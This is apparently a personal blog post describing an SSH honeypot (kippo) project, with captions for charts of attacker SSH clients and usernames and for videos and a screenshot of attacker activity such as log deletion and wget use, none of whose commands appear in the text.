SSH Honeypotting – Bad guy in action.

SSH Server allows remote control and access the system. This article, I would like to present my analysis from captured files and activities by the attacker, which is trapped in our SSH-Honeypot.

In here also I am going to post several videos or playback screen of the attackers activity in my honeypot.

Begin:

As few months back, I have launched my project  “Capturing Malware with Honeypot on Unifi https://wnnsnn.wordpress.com/2012/09/19/malware-honeypot-on-unifi-dionaea/

Basically this project is something I interested in and is able to publish this to public base on my finding.

An SSH server is a software program which uses the secure shell protocol to accept connections from remote computers. SFTP/SCP file transfers and remote terminal connection are popular use cases for a SSH server.

SSH Server has been used widely by private sectors and government – example SSH Server has been deployed in DNS Server, Mail Server and mostly Linux & UNIX servers.

I would like to start this post with statistic and results  I got from my honeypot.

Top 10 SSH clients

This vertical bar chart displays the top 10 SSH clients used by attackers during their hacking and total detected attempts.

SSH Client Version

Top 10 usernames

This vertical bar chart displays the top 10 usernames that attackers try when attacking the system.

Top Username Been Used

Play back screen – watch this:

This video shows the attacker activity after they managed to guess password from my running kippo.

Play back screen – From log file – Deleting history and logs file from the attacker.

On this video you will find few methods and commands executed by the attacker in order to remove and to hide their activities.

From log file – wget commands

The following table diplays the latest “wget” commands entered by attackers in the honeypot system.

Screen shot 2013-01-29 at 10.40.32 AM

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s